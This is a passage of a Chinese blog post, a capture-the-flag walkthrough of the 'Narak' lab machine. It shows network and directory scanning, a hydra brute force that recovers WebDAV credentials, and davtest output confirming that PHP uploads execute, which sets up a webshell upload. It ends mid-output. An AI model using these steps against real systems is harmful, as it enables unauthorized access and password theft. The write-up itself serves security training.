{"id":482,"date":"2025-11-12T09:39:22","date_gmt":"2025-11-12T01:39:22","guid":{"rendered":"https:\/\/www.sanjiuctf.cn\/?p=482"},"modified":"2025-11-12T09:39:23","modified_gmt":"2025-11-12T01:39:23","slug":"narak","status":"publish","type":"post","link":"https:\/\/www.sanjiuctf.cn\/?p=482","title":{"rendered":"Narak"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.sanjiuctf.cn\/wp-content\/uploads\/2025\/11\/image-196-1024x556.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"556\" data-original=\"https:\/\/www.sanjiuctf.cn\/wp-content\/uploads\/2025\/11\/image-196-1024x556.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-483\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>arp-scan -l<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u5148\u626b\u63cf\u9776\u673a\u5730\u5740\u4e3a\u591a\u5c11<\/h2>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.sanjiuctf.cn\/wp-content\/uploads\/2025\/11\/image-197.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"879\" height=\"252\" data-original=\"https:\/\/www.sanjiuctf.cn\/wp-content\/uploads\/2025\/11\/image-197.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-484\"  sizes=\"auto, (max-width: 879px) 100vw, 879px\" \/><\/div><\/figure>\n\n\n\n<pre class=\"wp-block-code\"><code>\u250c\u2500\u2500(root\u327fkali)-&#91;~\/\u684c\u9762]\n\u2514\u2500# arp-scan -l\nInterface: eth0, type: EN10MB, MAC: 00:0c:29:b6:0a:72, IPv4: 192.168.11.128\nStarting arp-scan 1.10.0 with 256 hosts (https:\/\/github.com\/royhills\/arp-scan)\n192.168.11.1    00:50:56:c0:00:08       VMware, Inc.\n192.168.11.2    00:50:56:e7:08:6b       VMware, Inc.\n192.168.11.136  00:0c:29:5c:19:cd       VMware, Inc.\n192.168.11.254  00:50:56:f2:bc:1e       VMware, Inc.\n\n4 packets received by filter, 0 packets dropped by kernel\nEnding arp-scan 1.10.0: 256 hosts scanned in 1.946 seconds (131.55 hosts\/sec). 4 responded\n<\/code><\/pre>\n\n\n\n<p>\u770b\u5230\u5730\u5740\u4e3a192.168.11.136<\/p>\n\n\n\n<p>\u7136\u540e\u5f00\u59cb\u4f7f\u7528nmap\u8fdb\u884c\u7aef\u53e3\u548c\u670d\u52a1\u7684\u53d1\u73b0<\/p>\n\n\n\n<p>nmap -sV -sC -p- 192.168.11.136<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.sanjiuctf.cn\/wp-content\/uploads\/2025\/11\/image-198.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"864\" height=\"371\" data-original=\"https:\/\/www.sanjiuctf.cn\/wp-content\/uploads\/2025\/11\/image-198.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-485\"  sizes=\"auto, (max-width: 864px) 100vw, 864px\" \/><\/div><\/figure>\n\n\n\n<pre class=\"wp-block-code\"><code>\u250c\u2500\u2500(root\u327fkali)-&#91;~\/\u684c\u9762]\n\u2514\u2500# nmap  -sV -sC -p-   192.168.11.136\nStarting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2025-06-30 22:06 EDT\nStats: 0:00:07 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan\nService scan Timing: About 50.00% done; ETC: 22:06 (0:00:06 remaining)\nNmap scan report for 192.168.11.136 (192.168.11.136)\nHost is up (0.00054s latency).\nNot shown: 65533 closed tcp ports (reset)\nPORT   STATE SERVICE VERSION\n22\/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   2048 71:bd:59:2d:22:1e:b3:6b:4f:06:bf:83:e1:cc:92:43 (RSA)\n|   256 f8:ec:45:84:7f:29:33:b2:8d:fc:7d:07:28:93:31:b0 (ECDSA)\n|_  256 d0:94:36:96:04:80:33:10:40:68:32:21:cb:ae:68:f9 (ED25519)\n80\/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))\n|_http-title: HA: NARAK\n|_http-server-header: Apache\/2.4.29 (Ubuntu)\nMAC Address: 00:0C:29:5C:19:CD (VMware)\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n\nService detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 7.45 seconds\n<\/code><\/pre>\n\n\n\n<p>22\u548c80 \u7aef\u53e3\u7ecf\u8fc7\u5bf9\u5f00\u653e\u7aef\u53e3\u548c\u670d\u52a1\u7684\u626b\u63cf\uff0c\u53d1\u73b0\u53ea\u5f00\u653e\u4e8622\u7aef\u53e3\u548c80\u7aef\u53e3\uff0c\u8bbf\u95ee80\u7aef\u53e3\u4e5f\u6ca1\u53d1\u73b0\u4ec0\u4e48\u53ef\u4ee5\u6d4b\u8bd5\u7684\u70b9\uff0c\u4e8e\u662f\u5f00\u59cb\u4f7f\u7528dirsearch\u8fdb\u884c\u76ee\u5f55\u7684\u626b\u63cf\u3002<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u4fe1\u606f\u6536\u96c6<\/h2>\n\n\n\n<p>dirsearch &#8211;url <a href=\"http:\/\/192.168.11.136\">http:\/\/192.168.11.136<\/a><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">dirsearch\u5b89\u88c5<\/h2>\n\n\n\n<p>\u5b89\u88c5\u4e4b\u524d\u5efa\u8bae\u5148\u66f4\u65b0\uff0c\u66f4\u65b0\u8981\u8fdb\u5165\u8d85\u7ea7\u7528\u6237<br>sudo su<br>apt-get update<br><a href=\"https:\/\/so.csdn.net\/so\/search?q=kali&amp;spm=1001.2101.3001.7020\">kali<\/a>\u4e2d\u5b89\u88c5\u547d\u4ee4\uff1aapt-get install dirsearch<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.sanjiuctf.cn\/wp-content\/uploads\/2025\/11\/image-199.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"966\" height=\"666\" data-original=\"https:\/\/www.sanjiuctf.cn\/wp-content\/uploads\/2025\/11\/image-199.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-486\"  sizes=\"auto, (max-width: 966px) 100vw, 966px\" \/><\/div><\/figure>\n\n\n\n<pre class=\"wp-block-code\"><code>\u250c\u2500\u2500(root\u327fkali)-&#91;~\/\u684c\u9762]\n\u2514\u2500# dirsearch --url http:\/\/192.168.11.136\n\/usr\/lib\/python3\/dist-packages\/dirsearch\/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https:\/\/setuptools.pypa.io\/en\/latest\/pkg_resources.html\n  from pkg_resources import DistributionNotFound, VersionConflict\n\n  _|. _ _  _  _  _ _|_    v0.4.3                                                                                   \n (_||| _) (\/_(_|| (_| )                                                                                            \n\nExtensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460\n\nOutput File: \/root\/\u684c\u9762\/reports\/http_192.168.11.136\/_25-06-30_22-11-20.txt\n\nTarget: http:\/\/192.168.11.136\/\n\n&#91;22:11:20] Starting:                                                                                               \n&#91;22:11:21] 403 -  279B  - \/.ht_wsr.txt                                      \n&#91;22:11:21] 403 -  279B  - \/.htaccess.bak1                                   \n&#91;22:11:21] 403 -  279B  - \/.htaccess.orig\n&#91;22:11:21] 403 -  279B  - \/.htaccess.sample\n&#91;22:11:21] 403 -  279B  - \/.htaccess.save                                   \n&#91;22:11:21] 403 -  279B  - \/.htaccess_extra\n&#91;22:11:21] 403 -  279B  - \/.htaccess_orig                                   \n&#91;22:11:21] 403 -  279B  - \/.htaccess_sc\n&#91;22:11:21] 403 -  279B  - \/.htaccessBAK\n&#91;22:11:21] 403 -  279B  - \/.htaccessOLD2                                    \n&#91;22:11:21] 403 -  279B  - \/.htaccessOLD\n&#91;22:11:21] 403 -  279B  - \/.htm                                             \n&#91;22:11:21] 403 -  279B  - \/.html\n&#91;22:11:21] 403 -  279B  - \/.htpasswds                                       \n&#91;22:11:21] 403 -  279B  - \/.htpasswd_test\n&#91;22:11:21] 403 -  279B  - \/.httr-oauth                                      \n&#91;22:11:21] 403 -  279B  - \/.php                                             \n&#91;22:11:33] 301 -  317B  - \/images  -&gt;  http:\/\/192.168.11.136\/images\/        \n&#91;22:11:33] 200 -  706B  - \/images\/                                          \n&#91;22:11:40] 403 -  279B  - \/server-status                                    \n&#91;22:11:40] 403 -  279B  - \/server-status\/                                   \n&#91;22:11:45] 401 -  461B  - \/webdav\/                                          \n&#91;22:11:45] 401 -  461B  - \/webdav\/servlet\/webdav\/\n&#91;22:11:45] 401 -  461B  - \/webdav\/index.html\n\nTask Completed         <\/code><\/pre>\n\n\n\n<p>\u7ecf\u8fc7\u76ee\u5f55\u626b\u63cf\uff0c\u53d1\u73b0\u4e86webdav\u7684\u8def\u5f84<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>\u4ec0\u4e48\u662f WebDAV \u5462\uff1f<\/strong><\/h2>\n\n\n\n<p>\u7b80\u5355\u6765\u8bf4\uff0cwebdav\u5c31\u50cf\u4e00\u4e2a\u5b58\u50a8\u670d\u52a1\uff0c\u5404\u79cd\u5e94\u7528\u90fd\u53ef\u4ee5\u8fde\u63a5\u5230\u5b83\uff0c\u5141\u8bb8\u5e94\u7528\u76f4\u63a5\u8bbf\u95ee\u6211\u4eec\u7684\u4e91\u76d8\u5185\u5bb9\uff0c\u5bf9\u5176\u8fdb\u884c\u8bfb\u5199\u64cd\u4f5c\u3002\u6211\u4eec\u53ef\u4ee5\u7f51\u7edc\u670d\u52a1\u6bd4\u4f5c\u4e00\u53ea\u7ae0\u9c7c\uff0c\u4e91\u76d8\u662f\u5b83\u7684\u5927\u8111\uff0cWebDAV\u662f\u5b83\u7684\u89e6\u89d2\u3002\u6bcf\u4e2a\u89e6\u89d2\u90fd\u8fde\u63a5\u5230\u6211\u4eec\u667a\u80fd\u8bbe\u5907\u4e0a\u7684\u5e94\u7528\u7a0b\u5e8f\u3002\u6211\u4eec\u7684\u5e94\u7528\u53ef\u4ee5\u901a\u8fc7\u89e6\u89d2\u8bfb\u53d6\u7ae0\u9c7c\u7684\u5927\u8111\uff0c\u5e76\u5c06\u6570\u636e\u5199\u5165\u5927\u8111\uff0c\u6539\u53d8\u5927\u8111\u7684\u8bb0\u5fc6\u548c\u5185\u5bb9\u3002<\/p>\n\n\n\n<p>\u767b\u5f55\u7f51\u7ad9\u770b\u770b<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.sanjiuctf.cn\/wp-content\/uploads\/2025\/11\/image-200-1024x631.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"631\" data-original=\"https:\/\/www.sanjiuctf.cn\/wp-content\/uploads\/2025\/11\/image-200-1024x631.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-487\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>\u53d1\u73b0\u9700\u8981\u5bc6\u7801kali\u7206\u7834\u4e00\u4e0b<\/p>\n\n\n\n<p>cewl <a href=\"http:\/\/192.168.11.136\">http:\/\/192.168.11.136<\/a> -w 192.168.11.136dict.txt<\/p>\n\n\n\n<p>\u7528kali\u81ea\u5e26\u7684\u5b57\u5178\u751f\u6210\u5de5\u5177cewl\u751f\u6210\u4e00\u4e2a\u9488\u5bf9\u8fd9\u4e2a\u7f51\u7ad9\u4e13\u5c5e\u7684\u5b57\u5178\u8fdb\u884c\u6d4b\u8bd5\u4e00\u6ce2\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.sanjiuctf.cn\/wp-content\/uploads\/2025\/11\/image-201.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"631\" height=\"74\" data-original=\"https:\/\/www.sanjiuctf.cn\/wp-content\/uploads\/2025\/11\/image-201.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-488\"  sizes=\"auto, (max-width: 631px) 100vw, 631px\" \/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.sanjiuctf.cn\/wp-content\/uploads\/2025\/11\/image-202.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"665\" height=\"520\" data-original=\"https:\/\/www.sanjiuctf.cn\/wp-content\/uploads\/2025\/11\/image-202.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-489\" style=\"width:801px;height:auto\"  sizes=\"auto, (max-width: 665px) 100vw, 665px\" \/><\/div><\/figure>\n\n\n\n<p>hydra -L 192.168.11.136dict.txt -P 192.168.11.136dict.txt 192.168.11.136 http-get \/webdav -v<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.sanjiuctf.cn\/wp-content\/uploads\/2025\/11\/image-203.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"952\" height=\"196\" data-original=\"https:\/\/www.sanjiuctf.cn\/wp-content\/uploads\/2025\/11\/image-203.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-490\"  sizes=\"auto, (max-width: 952px) 100vw, 952px\" \/><\/div><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">\u7206\u51fa\u5bc6\u7801<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>\u250c\u2500\u2500(root\u327fkali)-&#91;~\/\u684c\u9762]\n\u2514\u2500# hydra -L 192.168.11.136dict.txt -P 192.168.11.136dict.txt 192.168.11.136 http-get \/webdav -v\nHydra v9.5 (c) 2023 by van Hauser\/THC &amp; David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\n\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) starting at 2025-06-30 22:19:13\n&#91;DATA] max 16 tasks per 1 server, overall 16 tasks, 6724 login tries (l:82\/p:82), ~421 tries per task\n&#91;DATA] attacking http-get:\/\/192.168.11.136:80\/webdav\n&#91;VERBOSE] Resolving addresses ... &#91;VERBOSE] resolving done\n&#91;80]&#91;http-get] host: 192.168.11.136   login: yamdoot   password: Swarg\n&#91;STATUS] attack finished for 192.168.11.136 (waiting for children to complete tests)\n1 of 1 target successfully completed, 1 valid password found\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) finished at 2025-06-30 22:19:58\n<\/code><\/pre>\n\n\n\n<p>login: yamdoot password: Swarg<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.sanjiuctf.cn\/wp-content\/uploads\/2025\/11\/image-204-1024x553.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"553\" data-original=\"https:\/\/www.sanjiuctf.cn\/wp-content\/uploads\/2025\/11\/image-204-1024x553.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-491\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>\u6210\u529f\u7684\u7206\u7834\u51fa\u4e86\u8d26\u53f7\u548c\u5bc6\u7801\uff0c\u751f\u6210\u7684\u4e13\u5c5e\u5b57\u5178\u6bd4\u8f83\u597d\u7528\u3002\u7531\u4e8e\u6211\u4eec\u83b7\u53d6\u4e86webdav\u670d\u52a1\u7684\u76f8\u5173\u8ba4\u8bc1\u4fe1\u606f\uff0c\u6240\u4ee5\u63a5\u4e0b\u6765\u6211\u76f4\u63a5\u5f00\u59cb\u4f7f\u7528kali\u81ea\u5e26\u7684webdav\u6d4b\u8bd5\u5de5\u5177davtest\u8fdb\u884c\u6d4b\u8bd5\uff0c\u770b\u80fd\u5426\u4f20\u6587\u4ef6\u4e0a\u53bb\uff0c\u5982\u679c\u53ef\u4ee5\u7684\u8bdd\uff0c\u6211\u4eec\u53ef\u4ee5\u76f4\u63a5\u5c06webshell\u4f20\u5230\u670d\u52a1\u5668\u4e0a\uff0c\u4ee5\u4fbfgetshell\u7a81\u7834\u8fb9\u754c\u3002<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>webdav\u6f0f\u6d1e<\/strong><\/h2>\n\n\n\n<p>davtest -url <a href=\"http:\/\/192.168.11.136\/webdav\">http:\/\/192.168.11.136\/webdav<\/a> -auth yamdoot:Swarg<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.sanjiuctf.cn\/wp-content\/uploads\/2025\/11\/image-205.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"585\" height=\"657\" data-original=\"https:\/\/www.sanjiuctf.cn\/wp-content\/uploads\/2025\/11\/image-205.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-492\" style=\"width:677px;height:auto\"  sizes=\"auto, (max-width: 585px) 100vw, 585px\" \/><\/div><\/figure>\n\n\n\n<pre class=\"wp-block-code\"><code>\u250c\u2500\u2500(root\u327fkali)-&#91;~\/\u684c\u9762]\n\u2514\u2500# davtest -url http:\/\/192.168.11.136\/webdav -auth yamdoot:Swarg\n********************************************************\n Testing DAV connection\nOPEN            SUCCEED:                http:\/\/192.168.11.136\/webdav\n********************************************************\nNOTE    Random string for this session: yk0r_iLsd\n********************************************************\n Creating directory\nMKCOL           SUCCEED:                Created http:\/\/192.168.11.136\/webdav\/DavTestDir_yk0r_iLsd\n********************************************************\n Sending test files\nPUT     jhtml   SUCCEED:        http:\/\/192.168.11.136\/webdav\/DavTestDir_yk0r_iLsd\/davtest_yk0r_iLsd.jhtml\nPUT     shtml   SUCCEED:        http:\/\/192.168.11.136\/webdav\/DavTestDir_yk0r_iLsd\/davtest_yk0r_iLsd.shtml\nPUT     asp     SUCCEED:        http:\/\/192.168.11.136\/webdav\/DavTestDir_yk0r_iLsd\/davtest_yk0r_iLsd.asp\nPUT     aspx    SUCCEED:        http:\/\/192.168.11.136\/webdav\/DavTestDir_yk0r_iLsd\/davtest_yk0r_iLsd.aspx\nPUT     txt     SUCCEED:        http:\/\/192.168.11.136\/webdav\/DavTestDir_yk0r_iLsd\/davtest_yk0r_iLsd.txt\nPUT     html    SUCCEED:        http:\/\/192.168.11.136\/webdav\/DavTestDir_yk0r_iLsd\/davtest_yk0r_iLsd.html\nPUT     jsp     SUCCEED:        http:\/\/192.168.11.136\/webdav\/DavTestDir_yk0r_iLsd\/davtest_yk0r_iLsd.jsp\nPUT     php     SUCCEED:        http:\/\/192.168.11.136\/webdav\/DavTestDir_yk0r_iLsd\/davtest_yk0r_iLsd.php\nPUT     cgi     SUCCEED:        http:\/\/192.168.11.136\/webdav\/DavTestDir_yk0r_iLsd\/davtest_yk0r_iLsd.cgi\nPUT     pl      SUCCEED:        http:\/\/192.168.11.136\/webdav\/DavTestDir_yk0r_iLsd\/davtest_yk0r_iLsd.pl\nPUT     cfm     SUCCEED:        http:\/\/192.168.11.136\/webdav\/DavTestDir_yk0r_iLsd\/davtest_yk0r_iLsd.cfm\n********************************************************\n Checking for test file execution\nEXEC    jhtml   FAIL\nEXEC    shtml   FAIL\nEXEC    asp     FAIL\nEXEC    aspx    FAIL\nEXEC    txt     SUCCEED:        http:\/\/192.168.11.136\/webdav\/DavTestDir_yk0r_iLsd\/davtest_yk0r_iLsd.txt\nEXEC    txt     FAIL\nEXEC    html    SUCCEED:        http:\/\/192.168.11.136\/webdav\/DavTestDir_yk0r_iLsd\/davtest_yk0r_iLsd.html\nEXEC    html    FAIL\nEXEC    jsp     FAIL\nEXEC    php     SUCCEED:        http:\/\/192.168.11.136\/webdav\/DavTestDir_yk0r_iLsd\/davtest_yk0r_iLsd.php\nEXEC    php     FAIL\nEXEC    cgi     FAIL\nEXEC    pl      FAIL\nEXEC    cfm     FAIL\n\n********************************************************\n\/usr\/bin\/davtest Summary:\nCreated: http:\/\/192.168.11.136\/webdav\/DavTestDir_yk0r_iLsd\nPUT File: http:\/\/192.168.11.136\/webdav\/DavTestDir_yk0r_iLsd\/davtest_yk0r_iLsd.jhtml\nPUT File: http:\/\/192.168.11.136\/webdav\/DavTestDir_yk0r_iLsd\/davtest_yk0r_iLsd.shtml\nPUT File: http:\/\/192.168.11.136\/webdav\/DavTestDir_yk0r_iLsd\/davtest_yk0r_iLsd.asp\nPUT File: http:\/\/192.168.11.136\/webdav\/DavTestDir_yk0r_iLsd\/davtest_yk0r_iLsd.aspx\nPUT File: http:\/\/192.168.11.136\/webdav\/DavTestDir_yk0r_iLsd\/davtest_yk0r_iLsd.txt\nPUT File: http:\/\/192.168.11.136\/webdav\/DavTestDir_yk0r_iLsd\/davtest_yk0r_iLsd.html\nPUT File: http:\/\/192.168.11.136\/webdav\/DavTestDir_yk0r_iLsd\/davtest_yk0r_iLsd.jsp\nPUT File: http:\/\/192.168.11.136\/webdav\/DavTestDir_yk0r_iLsd\/davtest_yk0r_iLsd.php\nPUT File: http:\/\/192.168.11.136\/webdav\/DavTestDir_yk0r_iLsd\/davtest_yk0r_iLsd.cgi\nPUT File: http:\/\/192.168.11.136\/webdav\/DavTestDir_yk0r_iLsd\/davtest_yk0r_iLsd.pl\nPUT File: http:\/\/192.168.11.136\/webdav\/DavTestDir_yk0r_iLsd\/davtest_yk0r_iLsd.cfm\nExecutes: http:\/\/192.168.11.136\/webdav\/DavTestDir_yk0r_iLsd\/davtest_yk0r_iLsd.txt\nExecutes: http:\/\/192.168.11.136\/webdav\/DavTestDir_yk0r_iLsd\/davtest_yk0r_iLsd.html\nExecutes: 